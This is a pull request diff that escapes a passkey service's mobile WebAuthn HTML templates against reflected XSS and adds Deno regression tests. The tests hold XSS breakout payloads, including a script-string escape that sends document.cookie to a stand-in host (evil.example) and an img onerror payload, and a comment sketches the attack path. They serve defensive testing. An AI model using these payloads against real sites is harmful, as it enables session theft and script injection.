### PR TITLE
fix(passkey): escape mobile WebAuthn HTML templates against reflected XSS

### DIFF
--- a/supabase/functions/passkey/tests/html.test.ts
+++ b/supabase/functions/passkey/tests/html.test.ts
@@ -150,6 +150,57 @@ Deno.test({
 })
 
 Deno.test({
+  name: "dollar replacement patterns are inert in every template",
+  async fn() {
+    // String.prototype.replace applies `$`-pattern expansion ($$, $&, `` $` ``,
+    // $') to *string* replacement values, and that expansion runs after
+    // escaping. A `$&` sessionId would echo the raw placeholder back into the
+    // page and `` $` `` would splice the entire pre-match document into the
+    // string literal, killing the inline script. These values must survive
+    // substitution verbatim.
+    const reg = await getMobileRegistrationHTML(
+      "challenge-abc",
+      "user-123",
+      "victim@example.com",
+      "$&",
+      "api.risaboss.com",
+      "$$",
+    )
+    assertStringIncludes(reg, "const sessionId = '$&';")
+    assertStringIncludes(reg, "const rpName = '$$';")
+    assertEquals(reg.includes("{{SESSION_ID_JS}}"), false)
+
+    const splice = await getMobileRegistrationHTML(
+      "challenge-abc",
+      "user-123",
+      "victim@example.com",
+      "$`",
+      "api.risaboss.com",
+      "BOSS",
+    )
+    assertStringIncludes(splice, "const sessionId = '$`';")
+    // the pre-match document must not be spliced into the string literal
+    assertEquals((splice.match(/const challenge = 'challenge-abc';/g) ?? []).length, 1)
+
+    const auth = await getMobileAuthenticationHTML(
+      "challenge-abc",
+      "victim@example.com",
+      "$&",
+      "api.risaboss.com",
+      "credential-abc",
+      "$$",
+      Date.now(),
+    )
+    assertStringIncludes(auth, "const sessionId = '$&';")
+    assertStringIncludes(auth, "<span class=\"value\">$$</span>")
+
+    const err = await getMobileErrorHTML("$&")
+    assertEquals(err.includes("{{MESSAGE_HTML}}"), false)
+    assertStringIncludes(err, "$&")
+  },
+})
+
+Deno.test({
   name: "cleanup",
   fn: restoreAnonKey,
   sanitizeOps: false,

--- a/supabase/functions/passkey/tests/html.test.ts
+++ b/supabase/functions/passkey/tests/html.test.ts
@@ -1,0 +1,157 @@
+/**
+ * Regression coverage for the mobile WebAuthn HTML templates.
+ *
+ * challenge/email are constrained upstream (email format, a base64url
+ * challenge matched against a stored row) before reaching these templates,
+ * but sessionId and rpName (registration) are plain, unconstrained query
+ * parameters that are echoed straight into the returned page - into both
+ * HTML text and inline <script> string literals - with no character
+ * restriction. An attacker who knows a victim's email can obtain a real
+ * challenge/credentialId for that account from the public challenge-issuing
+ * endpoint, then craft a sessionId/rpName that breaks out of its context to
+ * run arbitrary JavaScript on the trusted api.risaboss.com origin, inside a
+ * page that also runs a real WebAuthn ceremony for the victim's own passkey.
+ *
+ * These tests assert the escaping actually closes both injection contexts:
+ * HTML text (email, credential display name, error message) and inline
+ * <script> string literals (challenge, userId, email, sessionId, rpId,
+ * rpName, credentialId).
+ */
+
+import { assertEquals, assertStringIncludes } from "jsr:@std/assert"
+import { getMobileRegistrationHTML, getMobileAuthenticationHTML, getMobileErrorHTML } from "../utils/html.ts"
+
+const previousAnonKey = Deno.env.get("SUPABASE_ANON_KEY")
+Deno.env.set("SUPABASE_ANON_KEY", "test-anon-key")
+
+function restoreAnonKey() {
+  if (previousAnonKey === undefined) Deno.env.delete("SUPABASE_ANON_KEY")
+  else Deno.env.set("SUPABASE_ANON_KEY", previousAnonKey)
+}
+
+// A single payload that, left unescaped, would (a) close the surrounding
+// single-quoted JS string, (b) run attacker JS via the resulting `; ... ;`,
+// and (c) close the surrounding <script> tag entirely via `</script>`.
+const SCRIPT_BREAKOUT_PAYLOAD = `x'; fetch('https://evil.example/c?'+document.cookie); //</script><script>alert(1)</script>`
+const HTML_BREAKOUT_PAYLOAD = `<img src=x onerror=alert(1)>`
+
+Deno.test({
+  name: "getMobileRegistrationHTML - sessionId cannot break out of its JS string literal",
+  async fn() {
+    const html = await getMobileRegistrationHTML(
+      "challenge-abc",
+      "user-123",
+      "victim@example.com",
+      SCRIPT_BREAKOUT_PAYLOAD,
+      "api.risaboss.com",
+      "BOSS",
+    )
+
+    // The raw payload must never appear verbatim - if it does, it broke out.
+    assertEquals(html.includes(SCRIPT_BREAKOUT_PAYLOAD), false)
+    // No unescaped "</script>" may appear anywhere except the real closing
+    // tags this template itself defines.
+    const scriptCloseCount = (html.match(/<\/script>/g) ?? []).length
+    assertEquals(scriptCloseCount, 1, "the payload's </script> must not add a second real closing tag")
+    // The sessionId assignment must still be a single, intact JS statement:
+    // the escaped value, quote-closed, semicolon-terminated, nothing injected after it.
+    assertStringIncludes(html, `const sessionId = 'x\\'; fetch(\\'https://evil.example/c?\\'+document.cookie); //\\u003C/script\\u003E\\u003Cscript\\u003Ealert(1)\\u003C/script\\u003E';`)
+  },
+  sanitizeOps: false,
+  sanitizeResources: false,
+})
+
+Deno.test({
+  name: "getMobileRegistrationHTML - rpName cannot break out of its JS string literal",
+  async fn() {
+    const html = await getMobileRegistrationHTML(
+      "challenge-abc",
+      "user-123",
+      "victim@example.com",
+      "session-abc",
+      "api.risaboss.com",
+      SCRIPT_BREAKOUT_PAYLOAD,
+    )
+    assertEquals(html.includes(SCRIPT_BREAKOUT_PAYLOAD), false)
+    assertEquals((html.match(/<\/script>/g) ?? []).length, 1)
+  },
+  sanitizeOps: false,
+  sanitizeResources: false,
+})
+
+Deno.test({
+  name: "getMobileRegistrationHTML - email is escaped in both the HTML badge and the script",
+  async fn() {
+    const html = await getMobileRegistrationHTML(
+      "challenge-abc",
+      "user-123",
+      HTML_BREAKOUT_PAYLOAD,
+      "session-abc",
+      "api.risaboss.com",
+      "BOSS",
+    )
+    assertEquals(html.includes(HTML_BREAKOUT_PAYLOAD), false)
+    // HTML-text context: entity-escaped.
+    assertStringIncludes(html, "&lt;img src=x onerror=alert(1)&gt;")
+    // JS-string context: angle brackets neutralized so no literal "<" survives.
+    assertEquals(html.includes("<img src=x onerror=alert(1)>"), false)
+  },
+  sanitizeOps: false,
+  sanitizeResources: false,
+})
+
+Deno.test({
+  name: "getMobileRegistrationHTML - benign values still round-trip correctly (no over-escaping)",
+  async fn() {
+    const html = await getMobileRegistrationHTML(
+      "challenge-abc",
+      "user-123",
+      "person@example.com",
+      "session-abc-123",
+      "api.risaboss.com",
+      "BOSS Console",
+    )
+    assertStringIncludes(html, "<div class=\"value\">person@example.com</div>")
+    assertStringIncludes(html, "const sessionId = 'session-abc-123';")
+    assertStringIncludes(html, "const rpName = 'BOSS Console';")
+  },
+  sanitizeOps: false,
+  sanitizeResources: false,
+})
+
+Deno.test({
+  name: "getMobileAuthenticationHTML - sessionId and credentialDisplayName cannot break out",
+  async fn() {
+    const html = await getMobileAuthenticationHTML(
+      "challenge-abc",
+      "victim@example.com",
+      SCRIPT_BREAKOUT_PAYLOAD,
+      "api.risaboss.com",
+      "credential-abc",
+      HTML_BREAKOUT_PAYLOAD,
+      Date.now(),
+    )
+    assertEquals(html.includes(SCRIPT_BREAKOUT_PAYLOAD), false)
+    assertEquals(html.includes(HTML_BREAKOUT_PAYLOAD), false)
+    assertEquals((html.match(/<\/script>/g) ?? []).length, 1)
+    assertStringIncludes(html, "&lt;img src=x onerror=alert(1)&gt;")
+  },
+  sanitizeOps: false,
+  sanitizeResources: false,
+})
+
+Deno.test({
+  name: "getMobileErrorHTML - message is HTML-escaped",
+  async fn() {
+    const html = await getMobileErrorHTML(HTML_BREAKOUT_PAYLOAD)
+    assertEquals(html.includes(HTML_BREAKOUT_PAYLOAD), false)
+    assertStringIncludes(html, "&lt;img src=x onerror=alert(1)&gt;")
+  },
+})
+
+Deno.test({
+  name: "cleanup",
+  fn: restoreAnonKey,
+  sanitizeOps: false,
+  sanitizeResources: false,
+})

--- a/supabase/functions/passkey/tests/html.test.ts
+++ b/supabase/functions/passkey/tests/html.test.ts
@@ -21,12 +21,22 @@
 import { assertEquals, assertStringIncludes } from "jsr:@std/assert"
 import { getMobileRegistrationHTML, getMobileAuthenticationHTML, getMobileErrorHTML } from "../utils/html.ts"
 
-const previousAnonKey = Deno.env.get("SUPABASE_ANON_KEY")
-Deno.env.set("SUPABASE_ANON_KEY", "test-anon-key")
-
-function restoreAnonKey() {
-  if (previousAnonKey === undefined) Deno.env.delete("SUPABASE_ANON_KEY")
-  else Deno.env.set("SUPABASE_ANON_KEY", previousAnonKey)
+/**
+ * Tests run in one process and Deno imports every test module before any
+ * test body runs, so the anon key is set per test (as routes.test.ts does)
+ * rather than at module top level: a top-level set would leak its value into
+ * every other test file for the whole run, and a trailing "cleanup" test
+ * never runs under `--filter`.
+ */
+async function withAnonKey<T>(produce: () => Promise<T>): Promise<T> {
+  const previousAnonKey = Deno.env.get("SUPABASE_ANON_KEY")
+  Deno.env.set("SUPABASE_ANON_KEY", "test-anon-key")
+  try {
+    return await produce()
+  } finally {
+    if (previousAnonKey === undefined) Deno.env.delete("SUPABASE_ANON_KEY")
+    else Deno.env.set("SUPABASE_ANON_KEY", previousAnonKey)
+  }
 }
 
 // A single payload that, left unescaped, would (a) close the surrounding
@@ -38,14 +48,14 @@ const HTML_BREAKOUT_PAYLOAD = `<img src=x onerror=alert(1)>`
 Deno.test({
   name: "getMobileRegistrationHTML - sessionId cannot break out of its JS string literal",
   async fn() {
-    const html = await getMobileRegistrationHTML(
+    const html = await withAnonKey(() => getMobileRegistrationHTML(
       "challenge-abc",
       "user-123",
       "victim@example.com",
       SCRIPT_BREAKOUT_PAYLOAD,
       "api.risaboss.com",
       "BOSS",
-    )
+    ))
 
     // The raw payload must never appear verbatim - if it does, it broke out.
     assertEquals(html.includes(SCRIPT_BREAKOUT_PAYLOAD), false)
@@ -64,16 +74,19 @@ Deno.test({
 Deno.test({
   name: "getMobileRegistrationHTML - rpName cannot break out of its JS string literal",
   async fn() {
-    const html = await getMobileRegistrationHTML(
+    const html = await withAnonKey(() => getMobileRegistrationHTML(
       "challenge-abc",
       "user-123",
       "victim@example.com",
       "session-abc",
       "api.risaboss.com",
       SCRIPT_BREAKOUT_PAYLOAD,
-    )
+    ))
     assertEquals(html.includes(SCRIPT_BREAKOUT_PAYLOAD), false)
     assertEquals((html.match(/<\/script>/g) ?? []).length, 1)
+    // Same exact-statement pin as the sessionId test, for rpName's position
+    // in the same script block.
+    assertStringIncludes(html, `const rpName = 'x\\'; fetch(\\'https://evil.example/c?\\'+document.cookie); //\\u003C/script\\u003E\\u003Cscript\\u003Ealert(1)\\u003C/script\\u003E';`)
   },
   sanitizeOps: false,
   sanitizeResources: false,
@@ -82,14 +95,14 @@ Deno.test({
 Deno.test({
   name: "getMobileRegistrationHTML - email is escaped in both the HTML badge and the script",
   async fn() {
-    const html = await getMobileRegistrationHTML(
+    const html = await withAnonKey(() => getMobileRegistrationHTML(
       "challenge-abc",
       "user-123",
       HTML_BREAKOUT_PAYLOAD,
       "session-abc",
       "api.risaboss.com",
       "BOSS",
-    )
+    ))
     assertEquals(html.includes(HTML_BREAKOUT_PAYLOAD), false)
     // HTML-text context: entity-escaped.
     assertStringIncludes(html, "&lt;img src=x onerror=alert(1)&gt;")
@@ -103,14 +116,14 @@ Deno.test({
 Deno.test({
   name: "getMobileRegistrationHTML - benign values still round-trip correctly (no over-escaping)",
   async fn() {
-    const html = await getMobileRegistrationHTML(
+    const html = await withAnonKey(() => getMobileRegistrationHTML(
       "challenge-abc",
       "user-123",
       "person@example.com",
       "session-abc-123",
       "api.risaboss.com",
       "BOSS Console",
-    )
+    ))
     assertStringIncludes(html, "<div class=\"value\">person@example.com</div>")
     assertStringIncludes(html, "const sessionId = 'session-abc-123';")
     assertStringIncludes(html, "const rpName = 'BOSS Console';")
@@ -122,7 +135,7 @@ Deno.test({
 Deno.test({
   name: "getMobileAuthenticationHTML - sessionId and credentialDisplayName cannot break out",
   async fn() {
-    const html = await getMobileAuthenticationHTML(
+    const html = await withAnonKey(() => getMobileAuthenticationHTML(
       "challenge-abc",
       "victim@example.com",
       SCRIPT_BREAKOUT_PAYLOAD,
@@ -130,7 +143,7 @@ Deno.test({
       "credential-abc",
       HTML_BREAKOUT_PAYLOAD,
       Date.now(),
-    )
+    ))
     assertEquals(html.includes(SCRIPT_BREAKOUT_PAYLOAD), false)
     assertEquals(html.includes(HTML_BREAKOUT_PAYLOAD), false)
     assertEquals((html.match(/<\/script>/g) ?? []).length, 1)
@@ -143,7 +156,7 @@ Deno.test({
 Deno.test({
   name: "getMobileErrorHTML - message is HTML-escaped",
   async fn() {
-    const html = await getMobileErrorHTML(HTML_BREAKOUT_PAYLOAD)
+    const html = await withAnonKey(() => getMobileErrorHTML(HTML_BREAKOUT_PAYLOAD))
     assertEquals(html.includes(HTML_BREAKOUT_PAYLOAD), false)
     assertStringIncludes(html, "&lt;img src=x onerror=alert(1)&gt;")
   },
@@ -158,31 +171,31 @@ Deno.test({
     // page and `` $` `` would splice the entire pre-match document into the
     // string literal, killing the inline script. These values must survive
     // substitution verbatim.
-    const reg = await getMobileRegistrationHTML(
+    const reg = await withAnonKey(() => getMobileRegistrationHTML(
       "challenge-abc",
       "user-123",
       "victim@example.com",
       "$&",
       "api.risaboss.com",
       "$$",
-    )
+    ))
     assertStringIncludes(reg, "const sessionId = '$&';")
     assertStringIncludes(reg, "const rpName = '$$';")
     assertEquals(reg.includes("{{SESSION_ID_JS}}"), false)
 
-    const splice = await getMobileRegistrationHTML(
+    const splice = await withAnonKey(() => getMobileRegistrationHTML(
       "challenge-abc",
       "user-123",
       "victim@example.com",
       "$`",
       "api.risaboss.com",
       "BOSS",
-    )
+    ))
     assertStringIncludes(splice, "const sessionId = '$`';")
     // the pre-match document must not be spliced into the string literal
     assertEquals((splice.match(/const challenge = 'challenge-abc';/g) ?? []).length, 1)
 
-    const auth = await getMobileAuthenticationHTML(
+    const auth = await withAnonKey(() => getMobileAuthenticationHTML(
       "challenge-abc",
       "victim@example.com",
       "$&",
@@ -190,19 +203,96 @@ Deno.test({
       "credential-abc",
       "$$",
       Date.now(),
-    )
+    ))
     assertStringIncludes(auth, "const sessionId = '$&';")
     assertStringIncludes(auth, "<span class=\"value\">$$</span>")
 
-    const err = await getMobileErrorHTML("$&")
+    const err = await withAnonKey(() => getMobileErrorHTML("$&"))
     assertEquals(err.includes("{{MESSAGE_HTML}}"), false)
     assertStringIncludes(err, "$&")
+
+    // `$'` completes the set: with a string replacement it would expand to
+    // the text after the match.
+    const dollarQuote = await withAnonKey(() => getMobileRegistrationHTML(
+      "challenge-abc",
+      "user-123",
+      "victim@example.com",
+      "$'",
+      "api.risaboss.com",
+      "BOSS",
+    ))
+    assertStringIncludes(dollarQuote, "const sessionId = '$\\'';")
   },
 })
 
 Deno.test({
-  name: "cleanup",
-  fn: restoreAnonKey,
-  sanitizeOps: false,
-  sanitizeResources: false,
+  name: "a backslash before a quote survives intact (the backslash rule runs first)",
+  async fn() {
+    // Without the backslash-doubling rule - or with it running after the
+    // quote rule - this value would escape to a literal that still closes at
+    // the first quote and hands the rest of the line to the JS parser.
+    const html = await withAnonKey(() => getMobileRegistrationHTML(
+      "challenge-abc",
+      "user-123",
+      "victim@example.com",
+      String.raw`x\'; alert(1); //`,
+      "api.risaboss.com",
+      "BOSS",
+    ))
+    assertStringIncludes(html, String.raw`const sessionId = 'x\\\'; alert(1); //';`)
+  },
+})
+
+Deno.test({
+  name: "CR and LF in a JS-string value are escaped to two-character sequences",
+  async fn() {
+    // A raw line break inside a single-line string literal is a syntax
+    // error, so it must reach the page as a backslash escape, not as the
+    // raw character.
+    const html = await withAnonKey(() => getMobileRegistrationHTML(
+      "challenge-abc",
+      "user-123",
+      "victim@example.com",
+      "a\nb\r",
+      "api.risaboss.com",
+      "BOSS",
+    ))
+    assertStringIncludes(html, "const sessionId = 'a\\nb\\r';")
+  },
+})
+
+Deno.test({
+  name: "escapeHtml escapes the ampersand before other entities",
+  async fn() {
+    // If "<" were escaped before "&", the "&" introduced by the "<"
+    // entity would be escaped a second time and double-escape the value.
+    const html = await withAnonKey(() => getMobileAuthenticationHTML(
+      "challenge-abc",
+      "victim@example.com",
+      "session-abc",
+      "api.risaboss.com",
+      "credential-abc",
+      "&<x",
+      Date.now(),
+    ))
+    assertStringIncludes(html, "&amp;&lt;x")
+  },
+})
+
+Deno.test({
+  name: "a value containing a later placeholder name is not expanded",
+  async fn() {
+    // A single pass over the original template must not re-scan substituted
+    // values: a sessionId that literally contains a placeholder name stays
+    // literal text instead of being filled in by a later substitution.
+    const html = await withAnonKey(() => getMobileRegistrationHTML(
+      "challenge-abc",
+      "user-123",
+      "victim@example.com",
+      "{{ANON_KEY_JS}}",
+      "api.risaboss.com",
+      "BOSS",
+    ))
+    assertStringIncludes(html, "const sessionId = '{{ANON_KEY_JS}}';")
+  },
 })

--- a/supabase/functions/passkey/utils/html.ts
+++ b/supabase/functions/passkey/utils/html.ts
@@ -40,6 +40,16 @@ function escapeJsString(value: string): string {
     .replace(/\n/g, "\\n")
 }
 
+/**
+ * Every template value is substituted with a *function* replacement
+ * (`() => value`) below rather than a plain string: `String.prototype.replace`
+ * applies `$`-pattern expansion (`$$`, `$&`, `` $` ``, `$'`) to the replacement
+ * string, and that happens *after* escaping. A sessionId of `$&` would echo the
+ * raw placeholder back into the page, and `` $` `` would splice the entire
+ * pre-match document into the string literal and kill the inline script. The
+ * function form returns the escaped value verbatim.
+ */
+
 const REGISTRATION_TEMPLATE = `<!DOCTYPE html>
 <html lang="en">
 <head>
@@ -1138,14 +1148,14 @@ export async function getMobileRegistrationHTML(
   const anonKey = Deno.env.get("SUPABASE_ANON_KEY") || "";
 
   return REGISTRATION_TEMPLATE
-    .replace(/{{EMAIL_HTML}}/g, escapeHtml(email))
-    .replace(/{{CHALLENGE_JS}}/g, escapeJsString(challenge))
-    .replace(/{{USER_ID_JS}}/g, escapeJsString(userId))
-    .replace(/{{EMAIL_JS}}/g, escapeJsString(email))
-    .replace(/{{SESSION_ID_JS}}/g, escapeJsString(sessionId))
-    .replace(/{{RP_ID_JS}}/g, escapeJsString(rpId))
-    .replace(/{{RP_NAME_JS}}/g, escapeJsString(rpName))
-    .replace(/{{ANON_KEY_JS}}/g, escapeJsString(anonKey));
+    .replace(/{{EMAIL_HTML}}/g, () => escapeHtml(email))
+    .replace(/{{CHALLENGE_JS}}/g, () => escapeJsString(challenge))
+    .replace(/{{USER_ID_JS}}/g, () => escapeJsString(userId))
+    .replace(/{{EMAIL_JS}}/g, () => escapeJsString(email))
+    .replace(/{{SESSION_ID_JS}}/g, () => escapeJsString(sessionId))
+    .replace(/{{RP_ID_JS}}/g, () => escapeJsString(rpId))
+    .replace(/{{RP_NAME_JS}}/g, () => escapeJsString(rpName))
+    .replace(/{{ANON_KEY_JS}}/g, () => escapeJsString(anonKey));
 }
 
 export async function getMobileAuthenticationHTML(
@@ -1161,17 +1171,17 @@ export async function getMobileAuthenticationHTML(
   const createdAtFormatted = new Date(credentialCreatedAt).toLocaleDateString();
 
   return AUTHENTICATION_TEMPLATE
-    .replace(/{{EMAIL_HTML}}/g, escapeHtml(email))
-    .replace(/{{CREDENTIAL_DISPLAY_NAME_HTML}}/g, escapeHtml(credentialDisplayName))
-    .replace(/{{CREDENTIAL_CREATED_AT_HTML}}/g, escapeHtml(createdAtFormatted))
-    .replace(/{{CHALLENGE_JS}}/g, escapeJsString(challenge))
-    .replace(/{{EMAIL_JS}}/g, escapeJsString(email))
-    .replace(/{{SESSION_ID_JS}}/g, escapeJsString(sessionId))
-    .replace(/{{RP_ID_JS}}/g, escapeJsString(rpId))
-    .replace(/{{CREDENTIAL_ID_JS}}/g, escapeJsString(credentialId))
-    .replace(/{{ANON_KEY_JS}}/g, escapeJsString(anonKey));
+    .replace(/{{EMAIL_HTML}}/g, () => escapeHtml(email))
+    .replace(/{{CREDENTIAL_DISPLAY_NAME_HTML}}/g, () => escapeHtml(credentialDisplayName))
+    .replace(/{{CREDENTIAL_CREATED_AT_HTML}}/g, () => escapeHtml(createdAtFormatted))
+    .replace(/{{CHALLENGE_JS}}/g, () => escapeJsString(challenge))
+    .replace(/{{EMAIL_JS}}/g, () => escapeJsString(email))
+    .replace(/{{SESSION_ID_JS}}/g, () => escapeJsString(sessionId))
+    .replace(/{{RP_ID_JS}}/g, () => escapeJsString(rpId))
+    .replace(/{{CREDENTIAL_ID_JS}}/g, () => escapeJsString(credentialId))
+    .replace(/{{ANON_KEY_JS}}/g, () => escapeJsString(anonKey));
 }
 
 export async function getMobileErrorHTML(message: string): Promise<string> {
-  return ERROR_TEMPLATE.replace(/{{MESSAGE_HTML}}/g, escapeHtml(message));
+  return ERROR_TEMPLATE.replace(/{{MESSAGE_HTML}}/g, () => escapeHtml(message));
 }

--- a/supabase/functions/passkey/utils/html.ts
+++ b/supabase/functions/passkey/utils/html.ts
@@ -41,14 +41,26 @@ function escapeJsString(value: string): string {
 }
 
 /**
- * Every template value is substituted with a *function* replacement
- * (`() => value`) below rather than a plain string: `String.prototype.replace`
- * applies `$`-pattern expansion (`$$`, `$&`, `` $` ``, `$'`) to the replacement
- * string, and that happens *after* escaping. A sessionId of `$&` would echo the
- * raw placeholder back into the page, and `` $` `` would splice the entire
- * pre-match document into the string literal and kill the inline script. The
- * function form returns the escaped value verbatim.
+ * Substitutes every `{{PLACEHOLDER}}` in one pass. Two properties matter:
+ *
+ * - **Function-form replacement.** `String.prototype.replace` applies
+ *   `$`-pattern expansion (`$$`, `$&`, `$` + backtick, `$'`) to *string*
+ *   replacements, and that happens *after* escaping: a sessionId of `$&`
+ *   would echo the raw placeholder back into the page, and a `$` + backtick
+ *   payload would splice the entire pre-match document into the string
+ *   literal and kill the inline script. A function replacement returns the
+ *   escaped value verbatim.
+ * - **One pass.** Sequential per-placeholder replaces would expand a value
+ *   that literally contains a *later* placeholder name (e.g. a sessionId of
+ *   `{{ANON_KEY_JS}}` would render the anon key into it). Scanning the
+ *   original template once means substituted values are never re-read.
+ *
+ * A placeholder absent from the map is left verbatim, the same failure mode
+ * as a missing per-placeholder replace.
  */
+function renderTemplate(template: string, values: Record<string, string>): string {
+  return template.replace(/{{(\w+)}}/g, (match, key) => (Object.hasOwn(values, key) ? values[key] : match))
+}
 
 const REGISTRATION_TEMPLATE = `<!DOCTYPE html>
 <html lang="en">
@@ -1147,15 +1159,16 @@ export async function getMobileRegistrationHTML(
 ): Promise<string> {
   const anonKey = Deno.env.get("SUPABASE_ANON_KEY") || "";
 
-  return REGISTRATION_TEMPLATE
-    .replace(/{{EMAIL_HTML}}/g, () => escapeHtml(email))
-    .replace(/{{CHALLENGE_JS}}/g, () => escapeJsString(challenge))
-    .replace(/{{USER_ID_JS}}/g, () => escapeJsString(userId))
-    .replace(/{{EMAIL_JS}}/g, () => escapeJsString(email))
-    .replace(/{{SESSION_ID_JS}}/g, () => escapeJsString(sessionId))
-    .replace(/{{RP_ID_JS}}/g, () => escapeJsString(rpId))
-    .replace(/{{RP_NAME_JS}}/g, () => escapeJsString(rpName))
-    .replace(/{{ANON_KEY_JS}}/g, () => escapeJsString(anonKey));
+  return renderTemplate(REGISTRATION_TEMPLATE, {
+    EMAIL_HTML: escapeHtml(email),
+    CHALLENGE_JS: escapeJsString(challenge),
+    USER_ID_JS: escapeJsString(userId),
+    EMAIL_JS: escapeJsString(email),
+    SESSION_ID_JS: escapeJsString(sessionId),
+    RP_ID_JS: escapeJsString(rpId),
+    RP_NAME_JS: escapeJsString(rpName),
+    ANON_KEY_JS: escapeJsString(anonKey),
+  })
 }
 
 export async function getMobileAuthenticationHTML(
@@ -1170,18 +1183,21 @@ export async function getMobileAuthenticationHTML(
   const anonKey = Deno.env.get("SUPABASE_ANON_KEY") || "";
   const createdAtFormatted = new Date(credentialCreatedAt).toLocaleDateString();
 
-  return AUTHENTICATION_TEMPLATE
-    .replace(/{{EMAIL_HTML}}/g, () => escapeHtml(email))
-    .replace(/{{CREDENTIAL_DISPLAY_NAME_HTML}}/g, () => escapeHtml(credentialDisplayName))
-    .replace(/{{CREDENTIAL_CREATED_AT_HTML}}/g, () => escapeHtml(createdAtFormatted))
-    .replace(/{{CHALLENGE_JS}}/g, () => escapeJsString(challenge))
-    .replace(/{{EMAIL_JS}}/g, () => escapeJsString(email))
-    .replace(/{{SESSION_ID_JS}}/g, () => escapeJsString(sessionId))
-    .replace(/{{RP_ID_JS}}/g, () => escapeJsString(rpId))
-    .replace(/{{CREDENTIAL_ID_JS}}/g, () => escapeJsString(credentialId))
-    .replace(/{{ANON_KEY_JS}}/g, () => escapeJsString(anonKey));
+  return renderTemplate(AUTHENTICATION_TEMPLATE, {
+    EMAIL_HTML: escapeHtml(email),
+    CREDENTIAL_DISPLAY_NAME_HTML: escapeHtml(credentialDisplayName),
+    CREDENTIAL_CREATED_AT_HTML: escapeHtml(createdAtFormatted),
+    CHALLENGE_JS: escapeJsString(challenge),
+    EMAIL_JS: escapeJsString(email),
+    SESSION_ID_JS: escapeJsString(sessionId),
+    RP_ID_JS: escapeJsString(rpId),
+    CREDENTIAL_ID_JS: escapeJsString(credentialId),
+    ANON_KEY_JS: escapeJsString(anonKey),
+  })
 }
 
 export async function getMobileErrorHTML(message: string): Promise<string> {
-  return ERROR_TEMPLATE.replace(/{{MESSAGE_HTML}}/g, () => escapeHtml(message));
+  return renderTemplate(ERROR_TEMPLATE, {
+    MESSAGE_HTML: escapeHtml(message),
+  })
 }

--- a/supabase/functions/passkey/utils/html.ts
+++ b/supabase/functions/passkey/utils/html.ts
@@ -3,6 +3,43 @@
  * Templates embedded as template literals for Edge Runtime compatibility
  */
 
+/**
+ * Escapes a value for safe inclusion as HTML text content. `email`,
+ * `sessionId`, `rpName` and `credentialDisplayName` all reach these
+ * templates as caller-supplied strings (query parameters or user-chosen
+ * credential names) with no character restriction upstream, so every value
+ * substituted into HTML text must be escaped here rather than trusted.
+ */
+function escapeHtml(value: string): string {
+  return value
+    .replace(/&/g, "&amp;")
+    .replace(/</g, "&lt;")
+    .replace(/>/g, "&gt;")
+    .replace(/"/g, "&quot;")
+    .replace(/'/g, "&#39;")
+}
+
+/**
+ * Escapes a value for safe inclusion inside a single-quoted JavaScript
+ * string literal within an inline <script> block. Beyond quote/backslash
+ * escaping (so the value cannot terminate the literal early and inject
+ * adjacent script), this also neutralizes "<" and ">" so a value cannot
+ * spell out "</script>" and close the surrounding script element entirely -
+ * a `<script>`-context XSS is not stopped by quote-escaping alone - and
+ * escapes raw CR/LF, which are illegal inside an unescaped single-line
+ * string literal (a raw newline would otherwise be a syntax error, not just
+ * odd formatting).
+ */
+function escapeJsString(value: string): string {
+  return value
+    .replace(/\\/g, "\\\\")
+    .replace(/'/g, "\\'")
+    .replace(/</g, "\\u003C")
+    .replace(/>/g, "\\u003E")
+    .replace(/\r/g, "\\r")
+    .replace(/\n/g, "\\n")
+}
+
 const REGISTRATION_TEMPLATE = `<!DOCTYPE html>
 <html lang="en">
 <head>
@@ -231,7 +268,7 @@ const REGISTRATION_TEMPLATE = `<!DOCTYPE html>
 
             <div class="email-badge">
                 <div class="label">Account</div>
-                <div class="value">{{EMAIL}}</div>
+                <div class="value">{{EMAIL_HTML}}</div>
             </div>
 
             <button id="registerBtn" class="button">
@@ -258,13 +295,13 @@ const REGISTRATION_TEMPLATE = `<!DOCTYPE html>
     </div>
 
     <script>
-        const challenge = '{{CHALLENGE}}';
-        const userId = '{{USER_ID}}';
-        const email = '{{EMAIL}}';
-        const sessionId = '{{SESSION_ID}}';
-        const rpId = '{{RP_ID}}';
-        const rpName = '{{RP_NAME}}';
-        const anonKey = '{{ANON_KEY}}';
+        const challenge = '{{CHALLENGE_JS}}';
+        const userId = '{{USER_ID_JS}}';
+        const email = '{{EMAIL_JS}}';
+        const sessionId = '{{SESSION_ID_JS}}';
+        const rpId = '{{RP_ID_JS}}';
+        const rpName = '{{RP_NAME_JS}}';
+        const anonKey = '{{ANON_KEY_JS}}';
 
         function base64urlToBuffer(base64url) {
             try {
@@ -677,16 +714,16 @@ const AUTHENTICATION_TEMPLATE = `<!DOCTYPE html>
 
             <div class="account-info">
                 <div class="label">Account</div>
-                <div class="value">{{EMAIL}}</div>
+                <div class="value">{{EMAIL_HTML}}</div>
 
                 <div class="credential-details">
                     <div class="row">
                         <span class="label">Credential</span>
-                        <span class="value">{{CREDENTIAL_DISPLAY_NAME}}</span>
+                        <span class="value">{{CREDENTIAL_DISPLAY_NAME_HTML}}</span>
                     </div>
                     <div class="row">
                         <span class="label">Created</span>
-                        <span class="value">{{CREDENTIAL_CREATED_AT}}</span>
+                        <span class="value">{{CREDENTIAL_CREATED_AT_HTML}}</span>
                     </div>
                 </div>
             </div>
@@ -715,12 +752,12 @@ const AUTHENTICATION_TEMPLATE = `<!DOCTYPE html>
     </div>
 
     <script>
-        const challenge = '{{CHALLENGE}}';
-        const email = '{{EMAIL}}';
-        const credentialId = '{{CREDENTIAL_ID}}';
-        const sessionId = '{{SESSION_ID}}';
-        const rpId = '{{RP_ID}}';
-        const anonKey = '{{ANON_KEY}}';
+        const challenge = '{{CHALLENGE_JS}}';
+        const email = '{{EMAIL_JS}}';
+        const credentialId = '{{CREDENTIAL_ID_JS}}';
+        const sessionId = '{{SESSION_ID_JS}}';
+        const rpId = '{{RP_ID_JS}}';
+        const anonKey = '{{ANON_KEY_JS}}';
 
         function base64urlToBuffer(base64url) {
             let base64 = base64url.replace(/-/g, '+').replace(/_/g, '/');
@@ -1046,7 +1083,7 @@ const ERROR_TEMPLATE = `<!DOCTYPE html>
 
                 <div class="error-message">
                     <div class="title">Error Details</div>
-                    <div class="message">{{MESSAGE}}</div>
+                    <div class="message">{{MESSAGE_HTML}}</div>
                 </div>
 
                 <div class="actions">
@@ -1099,15 +1136,16 @@ export async function getMobileRegistrationHTML(
   rpName: string
 ): Promise<string> {
   const anonKey = Deno.env.get("SUPABASE_ANON_KEY") || "";
-  
+
   return REGISTRATION_TEMPLATE
-    .replace(/{{CHALLENGE}}/g, challenge)
